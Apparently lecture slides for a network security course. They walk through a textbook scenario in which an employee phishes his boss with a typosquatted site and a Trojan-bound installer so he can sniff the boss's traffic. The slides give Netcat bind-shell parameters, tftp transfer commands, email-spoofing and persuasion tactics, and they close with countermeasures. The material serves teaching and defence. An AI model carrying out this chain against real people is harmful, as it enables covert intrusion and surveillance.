TEL 283 - Long Island University
What’s the Boss viewing?
The Boss established a new policy against surfing the web during work hours
Phoenix decides to examine the sites that the Boss is looking at by spying on him
The networked machines are connected via a switch
◦ Private 192.168.1.0 network
◦ Boss’ IP: 192.168.1.5
◦ Phoenix’s IP: 192.168.1.6
Monitor traffic to and from the Boss’ machine
How “loud” should this approach be?
◦ Loud/noisy means it could trigger alarms on IDS/IPS systems
There might be reasons to launch a noisy attack
◦ Provide a distraction from another attack
◦ Sometimes it’s the only way to monitor traffic
Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done
“Loud” methods
◦ Gratuitous ARP for individual hosts (ARP poisoning)
◦ MAC spoofing
◦ MAC flooding
◦ SPAN (port mirroring)
Gratuitous ARP
◦ Unsolicited ARP: the protocol allows for it without checking for a matching ARP request (stateless!)
◦ An ARP reply is sent out associating the target’s IP with the collector’s MAC address
◦ Spoof the MAC of the gateway
MAC spoofing
◦ Collector replies to ARP requests for the gateway’s MAC
◦ Switch will see the router’s MAC address on both switch ports and will send outbound traffic to both ports
MAC flooding
◦ Overwhelm the switch’s MAC table
◦ Causes the switch to “failover” into hub mode
◦ MACOF (http://monkey.org/~dugsong/dsniff/)
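Both ARP tricks above leave the same trace on the victim host: an IP that suddenly maps to a different MAC, and, in the gratuitous case, a reply nobody asked for. The following host-side watcher is an added illustration (not code from the slides or from the book’s scenario); the gateway address 192.168.1.1 and all MAC addresses are constructed.

```python
"""Host-side ARP watcher (added illustration, not from the slides; all addresses constructed).
ARP is stateless, so the watcher keeps the state the protocol lacks: asked-for IPs and last MACs."""
from dataclasses import dataclass
from typing import Dict, List, Set

ARP_REQUEST, ARP_REPLY = 1, 2

@dataclass
class ArpFrame:
    opcode: int
    sender_ip: str
    sender_mac: str
    target_ip: str

class ArpWatcher:
    def __init__(self) -> None:
        self.table: Dict[str, str] = {}  # ip -> MAC last learned for it
        self.asked: Set[str] = set()     # IPs this host has sent a request for
        self.alerts: List[str] = []

    def observe(self, f: ArpFrame) -> None:
        if f.opcode == ARP_REQUEST:
            self.asked.add(f.target_ip)
            return
        if f.opcode != ARP_REPLY:
            return
        # A reply for an IP nobody asked about is a gratuitous ARP.
        if f.sender_ip in self.asked:
            self.asked.discard(f.sender_ip)
        else:
            self.alerts.append(f"unsolicited reply: {f.sender_ip} is-at {f.sender_mac}")
        # A changed IP-to-MAC mapping is what both the gratuitous-ARP and the
        # answer-the-gateway-request (MAC spoofing) variant leave behind.
        old = self.table.get(f.sender_ip)
        if old is not None and old != f.sender_mac:
            self.alerts.append(f"mapping change: {f.sender_ip} {old} -> {f.sender_mac}")
        self.table[f.sender_ip] = f.sender_mac

def run_sample() -> List[str]:
    """Constructed trace as seen on the Boss's host; gateway 192.168.1.1 is assumed."""
    w = ArpWatcher()
    frames = [
        ArpFrame(ARP_REQUEST, "192.168.1.5", "00:00:5e:00:53:05", "192.168.1.1"),
        ArpFrame(ARP_REPLY, "192.168.1.1", "00:00:5e:00:53:01", "192.168.1.5"),  # real gateway
        ArpFrame(ARP_REPLY, "192.168.1.1", "00:00:5e:00:53:06", "192.168.1.5"),  # collector's MAC
    ]
    for f in frames:
        w.observe(f)
    return w.alerts
```

The spoofed reply that answers a real request (the MAC spoofing variant) produces only the second alert, so the mapping-change check is the one that matters in both cases.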
Capture the traffic on the target host itself
◦ Plant WinPcap and a Trojan horse on the host
The trick will be to install the software on the target host
◦ Boss will not blindly install software
◦ Have to convince him it’s something of value to him
The plan consists of a chained series of exploits
Copy a web site and host it on Phoenix’s server
Bind Netcat to a legitimate executable file
Send email to boss
◦ Download the free executable
◦ Netcat will also be downloaded and installed
Connect to boss’ machine using Netcat
Use TFTP to download a WinDump program onto boss’ machine
Capture the boss’ network traffic
Analyze captured traffic
Rebuild a jpg image using a hex editor
Phoenix locates a site and plans to get his boss to visit a copied version of the site
◦ Lays the groundwork via some social engineering
Tells boss of a site “certificatepractice.com” which offers a free CCNA practice exam as a promotional offer
◦ Uses a utility to download and mirror the site
Wget (www.gnu.org/software/wget)
Copies the site recursively to the hard drive, following the hyperlinks of the first page to an appropriate depth
Will also copy the practice test executable
Phoenix will bind his Trojan to this executable
Trojan wrapper program is used
◦ YAB (Yet Another Binder)
Areyoufearless.com (no longer there; however, it can be obtained via BitTorrent sites)
Altavista.net
Packetstormsecurity.org
Add Bind File option
◦ Allows Phoenix to bind nc.exe
◦ Will execute nc (asynchronously is possible)
◦ Can add execution parameters when nc starts up: -p 50 -e cmd.exe -L
◦ Registry startup option available (default is no)
Melt stub option
◦ Will remove netcat after execution
Icon can be added to make the install appear legitimate
Overwrite the original ccna.exe file with the bound Trojan file in the phony site
Register a very similar domain name
◦ “certification-practice.com”
Send an email to victim
◦ Phoenix uses an anonymous e-mailer and spoofs the email header to have the “From:” appear as the real site
www.mail.com
Doesn’t require a “real” email address to register
Victim would have to read the email message headers in order to see the real source domain
Check for spelling and grammatical errors
Offer something free or on a trial basis
Appeal to greed
◦ Explain why the victim is getting something for nothing
Lower suspicion
Appeal to victim’s sense of self
◦ Self-help tools, adding to success, etc.
Brevity
Text of the email contains the link to the site
Present the email to the victim
◦ Appears as the URL of the real site, but the hyperlink is really the phony site
◦ Possibly prepare the victim for the email, adding to the enticement
Angry IP Scanner
◦ www.angryziber.com/ipscan/
Scan IPs on the network for the IP with port 50 open and listening
nc to the victim’s machine on port 50
Verify the connection using ipconfig
◦ Will show the victim machine’s IP in the nc window
WinDump is downloaded
◦ nc does not allow for usage of a GUI (Windows) interface, so a command line utility is used
◦ Free
◦ No configuration required
◦ Windows already has a TFTP client!
◦ www.winpcap.org/windump
Phoenix sets up a TFTP server on his machine
◦ Sysinternals has a TFTP server available
◦ WinDump is placed into the default TFTP server directory (TFTP-Root)
Using Netcat, Phoenix types
tftp -i 192.168.1.6 get windump.exe windump.exe
◦ Syntax: tftp [-i] host [put | get] source destination
◦ -i switch: use binary transfer
WinDump options
◦ -c count (packets)
◦ -s snaplength (length of packets captured)
◦ -w filename (of captured packets)
windump -c 500 -s 1500 -w capture.log
If the victim does not have winpcap installed, Phoenix must transfer and manually install winpcap on the victim machine
◦ Windump requires winpcap
Phoenix downloads winpcap
Unzips it
TFTP (to victim’s winpcap directory):
◦ Daemon_mgm.exe
◦ NetMonInstaller.exe
◦ Npf_mgm.exe
◦ Rpcapd.exe
◦ Uninstall exe
Execute (using Netcat):
Npf_mgm.exe -r
Daemon_mgm.exe -r
NetMonInstaller.exe i
Transfer the capture back to Phoenix’s machine: tftp -i 192.168.1.6 put capture.log
Use a packet analyzer to view the traffic
◦ Wireshark
A review shows sites visited by the victim
Follow TCP stream
◦ Includes a GET (HTTP) for a file called “gambling.jpg”
◦ Capture the output as raw data
◦ Use a hex editor (WinHex), if required, to edit the raw data
Remove everything before the actual binary file (HTTP commands, etc.)
Leaves just the actual binary of the image
Jpg starts with ÿØÿà (bytes FF D8 FF E0)
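The hex-editor step above, done in code: an analyst reconstructing a file from a Follow TCP Stream dump strips the GET and the response headers and keeps the bytes from the JPEG start marker to the end marker. This carver is an added illustration (not from the slides or the book); the captured stream it parses is constructed, and the file name gambling.jpg is the one from the scenario.

```python
"""Carve the JPEG body out of a raw TCP stream saved from Wireshark's Follow TCP Stream.
Added illustration, not from the slides; the stream below is constructed. A JFIF image
begins FF D8 FF E0, which a Latin-1 hex editor renders as the four characters ÿØÿà."""
import re
from typing import Optional

JPEG_SOI = b"\xff\xd8\xff"   # Start Of Image plus the first marker prefix byte
JPEG_EOI = b"\xff\xd9"       # End Of Image
STATUS_LINE = re.compile(rb"(?m)^HTTP/1\.[01] \d{3}")  # the response line, not the GET line

def carve_jpeg(stream: bytes) -> Optional[bytes]:
    m = STATUS_LINE.search(stream)
    if m is None:
        return None
    hdr_end = stream.find(b"\r\n\r\n", m.start())
    if hdr_end == -1:
        return None
    body = stream[hdr_end + 4:]
    # Honour Content-Length if present so data from a later response on the same connection is dropped.
    for line in stream[m.start():hdr_end].decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-length" and value.strip().isdigit():
            body = body[: int(value)]
    if not body.startswith(JPEG_SOI):
        return None              # header block not fully removed, or the body is not a JPEG
    end = body.rfind(JPEG_EOI)
    return body[: end + 2] if end != -1 else None

# Constructed stream: the GET, a minimal 12-byte JFIF-style response, then a second response.
SAMPLE_STREAM = (
    b"GET /gambling.jpg HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
    b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\nContent-Length: 12\r\n\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\xff\xd9"
    b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
)

def carve_sample() -> Optional[bytes]:
    return carve_jpeg(SAMPLE_STREAM)
```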
Anonymous note left on the victim’s desk highlighting the activity
Internet usage policy relaxed the next day
Phishing / Trojan horse
◦ Training!
◦ Spam filters / phishing filters
◦ Anti-virus software (latest signatures)
◦ However, organizations will alter the Trojan (for a price) so that it does not match a signature
EliteC0ders (no longer offers this “service”)
◦ Software policy
◦ Sniffing
Port security on switches: protects against ARP poisoning, MAC spoofing and MAC flooding
Cisco Secure Agent: warns if a new application is launching
IPS
PromiScan
Host based IDS